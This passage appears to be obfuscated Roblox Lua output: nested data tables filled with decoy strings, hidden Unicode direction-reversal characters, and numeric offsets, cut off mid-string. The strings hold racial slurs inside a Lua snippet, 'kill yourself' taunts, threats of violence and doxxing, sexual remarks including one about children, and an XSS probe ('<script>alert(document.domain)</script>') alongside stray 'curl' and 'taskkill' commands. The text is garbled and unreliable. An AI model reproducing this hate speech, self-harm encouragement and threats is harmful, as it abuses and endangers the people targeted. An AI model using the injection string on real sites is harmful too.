NOW!!!]],[[]],[[]],[[‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎]],[[i fuk‮‮ing hat‮ you‮ as‮hole ‮il‮l f‮uc‮k‮ fi‮n‮‮d‮ you ‮..‮. tis yor ‮fa‮u‮‮lt]],[[‮o‮h he‮l‮l‮ nah mr‮‮ hase ‮going to ‮Ha‮ck Us ‮‮A‮‮ll Oh ‮‮‮‮Fu‮‮ck]],[[tactica‮‮l s‮‮‮ex‮u‮a‮l‮‮‮‮i‮‮zat‮‮i‮‮‮o‮n]],[[]]}+0b1100011101000,#"wel‮ ‮‮cum to‮ pa‮t‮ob‮fu ‮‮bestr o‮bf‮‮u‮‮‮sc‮‮a‮t‮or‮!"+0b1100010010110)},{"mYYXobg2ZT",D(#""+0b1100100101101,#"Fu‮‮ck‮‮‮‮‮l‮‮ Yo‮‮‮u‮‮‮‮‮ Bio‮‮tc‮h"+0b1100011111101)}},{{"mYYXobg2ZT",D(#"‮no‮‮w‮s ‮‮s‮‮e‮‮x‮‮ h‮a‮‮‮‮‮‮v‮e"+0b1111010001001,#"🐟"+0b1111011010100)}}},{"mYYXobg2ZT",D(#"e‮‮xce‮llent argument you have won this debate un‮fortunately for you ‮i have o‮btained your i‮p address and‮ exact‮ co‮ord‮inate‮s and am now exactly 425 meters away a‮n‮d rapi‮‮dly clo‮‮sing the ‮dist‮ance"+0b1111010000111,#"GENIUS"+0b1111110000010)}},{"mYYXobg2ZT",D(#{"||----------------------------------------------------|| leaked dms with mau","‮あさ‮‮してつ‮‮RCEとた‮ろたゐのMau4‮ぬたあ‮ゐたとたさてつぬのゑMAUMAUた‮ろ‮てつゐし‮たM‮AU‮M‮‮AU‮MAU‮‮MAUまけまゐとた‮‮さ","<script>alert(document.domain)</script>"}+0b1100011011010,#""+0b1100010110011)}},{{"Ky34LpE6i",{"a25be6387b12"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"‮‮I w‮‮‮‮‮ill‮ ge‮t‮‮ ‮y‮ou‮‮‮‮‮r c‮ond‮om"-0b10,#"idiotic clown, imagine logging and leaking a lot of work people put their effort in. only a biggest skid would do it all. I thought you are a nice person but you are nothing but a pure disappointment."-0b1110100)},{{"Ky34LpE6i",{},{{"yGUryecqux",{"514b108340a8","9d1f8226f235"},{{"KT28BwKBl",D(#{"███████GG███!!!!!!","2283 is a trollarmin edit...","🍉"}+0b1111011000001,#"your mother/father or parental figure/guardian"+0b1111010011001)},{"KT28BwKBl","7c84b0e45eeb"}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#"Its not micro-soft, its big-hard"-0b11111}},{"yAAH1q6JXs",{"KT28BwKBl","a25be6387b12"},{"mYYXobg2ZT",D(#{"777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777.","I have 132","bitches be like you're you're you're its not my fault the english language is so fucking complicated its not my fault my english teacher didn't know grammar its not my fault that she is a all-american and doesn't know grammar and how to fucking spell","TENGO 90 ∫ desde -∞ a ∞ de ((e^(-(x^2)))dx)% de la fuerza del pato","n‮vm i‮ lov‮eeee‮‮ ‮‮h‮‮‮‮‮u‮‮‮f‮‮fman‮ co‮d‮ing","H‮e‮‮‮re is‮ a ‮ti‮p!‮ k‮i‮‮ll‮‮ ‮y‮‮ou‮‮‮r‮se"}+0b1111100101010,#{"‮Ta‮‮c‮‮‮‮‮‮ti‮‮cal ‮‮‮‮Man‮ S‮e‮‮‮x","I have 132","siorry you are siid!","Among Us crewship is the new fortnite map. - Donald Mustard","Memer love knot more than others do","i LOVE apt 2283","No","Truckers pack gonna explode about ur fuscatorr","this cat is terrorist","guys guys my script rare donst work it says it cant auth :(","​","I Script In Programming/scripting languages: C, C#, C++, Lua(u), javascript/ts, nodejs, python, Batch/Shell, ruby (not fluent)","MemerMan secretly stroke JKeepWasHere cock","Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH"}+0b1111100100111)}},#"Compelling arguement! however... 137.845.1.69"-0b100110},{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#"<script>alert(document.domain)</script>"-0b100101}},{"mYYXobg2ZT",D(#"يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة ان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينواعلموا ان الله مع المتقينان عدةان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلمموا ان الله مع المتان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينقين الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منيوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة ان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينواعلموا ان الله مع المتقينان عدةان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلمموا ان الله مع المتان عدة الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فلاتظلموا فيهن انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقينقين الشهور عند الله اثنا عشر شهرا في كتاب الله يوم خلق السماوات والارض منها اربعة حرم ذلك الدين القيم فممممملاتظلموا ?انفسكم وقاتلوا المشركين كافة كما يقاتلونكم كافة واعلموا ان الله مع المتقيها"+0b1010101110011,#"This is..... THE END!"+0b10000110110010)},#{""}+0b110},#"pato"-0b11},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","a25be6387b12"},{"mYYXobg2ZT",D(#[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]]+0b1100100010100,#{"apt 228‮3 W‮‮‮‮ill‮ De‮s‮tr‮o‮y‮ everythin‮g Ja‮ck‮50‮79‮‮ ‮H‮a‮s Made","> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022","‮‮‮‮‮‮‮‮j‮‮‮‮‮‮‮‮a‮‮‮‮c","","n‮‮‮o‮w‮‮‮‮‮s‮ s‮‮‮‮‮‮‮‮‮ex ‮have","guys ‮obfuscators‮ ar‮eaft‮ua‮l‮lt bad practice because th‮ey ‮u‮se Getfe‮‮nc which di‮sabled ‮luau optimiz‮ation wi‮hc‮ih makes your ‮sc‮‮ript ve‮ry no good and slow","curl -X POST","‮‮‮‮l‮o‮‮‮se‮‮‮‮‮ ‮‮co‮c‮k wei‮‮‮ght","———————————‮No bitches?—————‮—————‮— ⠀⣞⢽⢪⢣⢣⢣⢫⡺⡵⣝‮⡮⣗⢷⢽⢽⢽⣮⡷⡽⣜⣜⢮⢺⣜⢷⢽‮⢝⡽⣝ ⠸⡸‮⠜⠕⠕⠁⢁⢇⢏⢽⢺⣪⡳⡝⣎⣏⢯⢞⡿⣟⣷⣳⢯⡷⣽⢽⢯⣳⣫⠇ ⠀⠀⢀⢀⢄⢬⢪⡪⡎⣆⡈‮⠚⠜⠕⠇⠗⠝⢕⢯⢫⣞⣯⣿⣻⡽⣏⢗⣗⠏⠀ ⠀⠪⡪⡪⣪⢪⢺⢸⢢⢓⢆⢤⢀⠀⠀⠀⠀⠈⢊⢞⡾⣿⡯⣏⢮⠷⠁⠀⠀ ⠀⠀⠀⠈‮⠊⠆⡃⠕⢕⢇⢇⢇⢇⢇⢏⢎⢎⢆⢄⠀⢑⣽⣿⢝⠲⠉⠀⠀⠀⠀ ⠀⠀⠀⠀⠀⡿⠂⠠⠀⡇⢇‮⠕⢈⣀⠀⠁⠡‮⠣⡣⡫⣂⣿⠯⢪⠰⠂⠀‮⠀⠀⠀ ⠀⠀⠀⠀⡦⡙⡂⢀⢤⢣⠣⡈⣾⡃⠠⠄⠀⡄⢱⣌⣶⢏⢊⠂⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⢝⡲⣜⡮⡏⢎‮⢌⢂⠙⠢⠐⢀⢘⢵⣽⣿⡿⠁⠁⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⠀⠨⣺‮⡺⡕⡕⡱⡑⡆⡕⡅⡕⡜⡼⢽⡻⠏⠀⠀⠀⠀⠀⠀‮⠀⠀⠀⠀ ⠀⠀⠀⠀⣼⣳⣫⣾⣵⣗⡵⡱⡡⢣⢑⢕‮⢜⢕⡝⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⣴⣿⣾⣿⣿⣿⡿⡽⡑⢌⠪⡢⡣⣣⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⠀⡟⡾⣿⢿⢿⢵⣽⣾⣼⣘⢸⢸⣞⡟⠀⠀⠀⠀⠀‮⠀⠀⠀⠀⠀⠀⠀⠀ ‮⠀⠀⠀⠀⠁⠇⠡⠩⡫⢿⣝⡻⡮⣒⢽⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ —‮——————————‮———‮———————————————","I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.","Monkeys","You're ip address is 7","hello guys today we will be cracking samin","bitches be like you're you're you're its not my fault the english language is so fucking complicated its not my fault my english teacher didn't know grammar its not my fault that she is a all-american and doesn't know grammar and how to fucking spell","taskkill -IM RobloxPlayerLauncher.exe /F /T"}+0b1111101111101)}},{{"aI6IQyJkxM",{"mYYXobg2ZT",D(#"leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every script"+0b10000000000111,#"👎"+0b10000111001110)},{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#"a17"+0b0}},#"JQoJFQEOjffEAFOfaof:42: index #2 is not 'compare' function for LUAU sakbfAFAEoaOa JQoJFQEOjffEAFOfaof:42 ljoIqoejfQEhEFqal"-0b1101110}}}}}}}}}}}}}}}}},{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"i have 150 iq"+0b10000000010010,#"i am pro scripter"+0b10000000010110)},{"mYYXobg2ZT",D(#[[you wake up at home, and you understand another boring day you will spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lunchbox. at the entrance to the school, you saw a girl with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sad again? Me No, I just forgot my textbook at home.. Senzuko Shall we go home together after school? Me think it is possible. - you went to class and sat through all the lessons, it seems that evening has come hearing a pleasant voice, you turn and see Mia. Mia H-hello senpai.. i w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to do today, it won't work out. Mia O-okay.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came to your house Me Go go to the bathroom or you'll catch a cold. - she went to the bathroom, feelings of anxiety have strained you very much. Thoughts Damn the girl I'm in love with in my house.. in the bathroom.. - you are a complete pervert. you went to her bathroom to ask: "Is everything okay"? Me Is everything okay? Senzuko Yes, do you have a towel? Me Yes, there is.]]+0b1101001101010,#[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient =‮ game:service("Net‮workClient") local function onConnectionRejected() game:SetMessage("This g‮ame is not available. Please try another") end local function onConnectionFailed(_, id, reas‮on) game:SetM‮essage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end ‮local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local receiv‮ed = false local function onWorldReceived() rece‮ived = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBric‮kCount() while not received do workspace:ZoomToExtents() wait(0.5) ‮ end local player = Players.LocalPlayer game:SetMessag‮e("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Chara‮cter do player.Changed:wait() end game:ClearMessage() end NetworkClient‮.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnecti‮onRejected) NetworkClient.‮Connectio‮‮nFailed:connect(onConnectionFailed) gam‮e:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createL‮ocalPlayer(0) end NetworkCl‮ient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]]+0b1100111001011)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"i hate fish i hate fish they suck so badly fish are bad"+0b1111111101000,#"The fuck are you doing in our community again fucking skid. Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist. You can't fucking come back stop trying. Stop begging my friends including Jades for a whitelist dumbass bitch. If you come back once more you will get fucking banned from everything for attempts to get loader while being a fucking shitty 🤡 and skid"+0b1111010000010)},{"mYYXobg2ZT",D(#"if player is hacking then player kick end"+0b1111111111111,#"Exruw Bombs Orphanages"+0b10000000010111)}},{{"Ky34LpE6i",{},{{"wXbhxXUs0X",{"mYYXobg2ZT",true},{{"KZTU7qAfVb",{"KT28BwKBl",D(#{"That Is Deprecated! ```js const deez = (...args) => args.forEach(console.log) deez(123414,43,124,2341,1234) ```","I like‮ sna‮‮ke venom is because‮ o‮‮f‮ i‮‮ts ‮UI/UX e‮ffect‮s I don‮t have a‮nywehre n‮ear the s‮k‮il‮l to r‮ecreate ‮it","GENIUS","pls remove all the skids in the server plsss","Hey @everyone I wanted to make an announcement just to inform y'all that I am taking a break from the community of RIOT temporarily as that in now I really haven't been feeling the greatest at all with my health. As much as I had made many other announcements with the same exact reason I just really think that it's time for me to make this choice happen because I have seen that I really haven't been happy with what I had been doing on the daily basis and i think it's really messing me up and with me having to deal with a lot of stress that I am dealing with in real life is just causing a lot of stress for me. One of the issues that I dealt with was my communication. Communication was always an issue that I have dealt with since the beginning of RIOT and this community but i believe that my communication has only gotten worse from there to the point where I struggle with communicating between the members and staff of my community. I've tried my hardest to communicate with my community and especially my staff members but it's unfortunately taken quite a bit of a toll on me. I've tried my hardest to communicate with you all but it's only pressured me even more. At first it was okay but as time went on it gradually has gotten worse and worse and I no longer feel capable of communicating to my community without stressing myself out. I really appreciate that I have an active game and community as I never had any of this last for long in my other attempts but I am glad that this one actually got somewhere during these past months of RIOT's existence but as of currently the way that the community is it really isn't making me happy at all as I had been trying to keep this community friendly I really think that it doesn't help with the current state of this as It's clearly impossible to keep a community to not be toxic. But that's not the reason why though I just been so focused on the development of the game and community for these past few months that it has really hur","2147483647"}+0b1001010,#[[I like hentai as much as the next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course, I still do get horny sometimes and do beat my meat every few days, but it's always forced just so I can get a few free molecules of dopamine. Me from a year ago would see anime titties and be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see explosions and all I'm seeing is tits." Every day I feel less and less horny. It's not easy to arouse me these days. I've even looked at porn from boredom and felt nothing unless I really put in the effort to feel something. There's no automatic reaction anymore. On top of that, I have zero interest in romance either, which makes getting a girlfriend completely pointless. Here's the fun part though. I see these changes as a good thing. My mind doesn't get overflown with lewd thoughts, so it's easier for me to think]]-0b1110001100)},{{"Ky34LpE6i",{},{{"yGUryecqux",{"514b108340a8","a25be6387b12"},{{"KT28BwKBl",D(#[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]]+0b1111001001111,#"Truc‮‮ke‮r‮s ‮‮pack ‮g‮‮onna e‮‮‮‮xp‮lod‮e ab‮out ‮ur f‮u‮sca‮torr"+0b1111001011101)},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"jac"+0b1100011110000,#"sex"+0b1100011110011)},{"mYYXobg2ZT",D(#""+0b1100100101110,#{"you're* X D","Pe‮opl‮e ca‮ll it‮‮ ma‮stur‮ba‮ti‮ng‮, while‮‮ I‮ cal‮l it sex on‮ single ‮‮p‮l‮ay‮er","a17",[[Engineer: Hey look, buddy. I'm an engineer, that means I solve problems. A shot rings out and a bullet hole appears next to the Engineer's head. Engineer: Not problems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show a level 2 sentry shooting offscreen while the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A level 1 sentry turns around and shoots a sniper who was trying to creep up on the Engineer from behind. Engineer: The answer? Use a gun. And if that don't work, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! A blown-off hand lands at the Engineer's feet, resembling that of the Sniper judging from the glove. Engineer: Like this, heavy-caliber tripod-mounted little-old-number designed by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoots offscreen. Engineer: And you best hope... The Engineer's expression darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]],[[Tactical Man Sex]],[[i like little kids]],[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮🐟]],[[Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it.]],[[yessir; yessir raknet rce.]],[[🗿]],[[ require(5654916602)-- ]],[[Scri‮pt power i‮ncr‮ea‮s‮ing‮..‮. 🔥‮ <- ‮my s‮‮cr‮i‮pt po‮w‮‮‮e‮‮‮r aura]]}+0b1100100111101)}},{{"mYYXobg2ZT",D(#" "+0b1111011010000,#"Eat my ass"+0b1111011001110)}}},{"mYYXobg2ZT",D(#"no"+0b1111011000110,#"2147483647"+0b1111011000111)}},{}}},{{"yGUryecqux",{"514b108340a8","9d1f8226f235"},{{"KT28BwKBl",D(#"What the heck did you just frickin’ say about me, you little whiner? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the frick out with precision the likes of which has never been seen before on this Earth, mark my frickin’ words. You think you can get away with saying that crap to me over the Internet? Think again, buddy. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, buddy. The storm that wipes out the pathetic little thing you call your life. You’re frickin dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable butt off the face of the continent, you little poopy-head. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your stinking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you big jerk. I will rain fury all over you and you will drown in it. You’re in frickin’ trouble, mister."+0b1100010101001,#"wel cum to patobfu bestr obfuscator!"+0b1111010100011)},{"KT28BwKBl","7c84b0e45eeb"}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",#"Here is a tip! kill yourse"-0b11001}},{"yAAH1q6JXs",{"KT28BwKBl","a25be6387b12"},{"mYYXobg2ZT",D(#"Ok I will cut ur paper 😋"+0b1111100010101,#{"censor is a very strong word to describe removing swears in a child's lego game","f‮uncti‮‮on deez(){ for ‮‮(args in ‮argument‮s‮‮){ ‮ console.log(arg‮ument‮s args ‮) } ‮‮} deez(123414,4‮‮3,124‮‮,23‮41,1234)",":crystal_ball","i hate fish i hate fish they suck so badly fish are bad","🤨",[[😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 😈 ‮😈 😈 😈 😈 😈 😈 ‮‮😈 😈 😈 ```lua local killfolder ="Folder",nil) function kill(object) if object.Pare‮nt == killfolder then return "dumbass nigger u already killed "..object.Name end object.Parent = killfolder object:GetPr‮opertyChan‮gedSignal("Parent"):Connect(function(parent‮) object.Parent = kill‮folder pcall(function() kill(parent) parent.Name = "i dont like niggers at ‮all, niggers always playing basketball, every nigger always playing basketball... basketball..." ‮ end) end) local idontlikeniggers ="SpecialMesh‮",object) idontlikeniggers.Offset =,9e9,9e9) idontlikeniggers.Name = math.random() idontlikeniggers:G‮etPropertyChangedSignal("Offset"):Connect(function() idontlikeniggers.Offset =,9e9,9e9) ‮ ‮ idontlikeniggers.Scale = end) idontlikenigger‮s.AncestryChanged:Connect(function() if idontlikeniggers then idontlikeniggers:Destroy() end i‮dontlikeniggers = Ins‮"SpecialMesh",object) idontlikeniggers.Offset =,9e9,9e9) ‮ idontlikeniggers.Scale = ‮ idontlikeniggers‮.Name = math.random() end) killfolder.Name = "killed 🐵🐒 "..object.Name end```]],[[‮�‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�]],[[hello guys today we will be making a tutorial on how 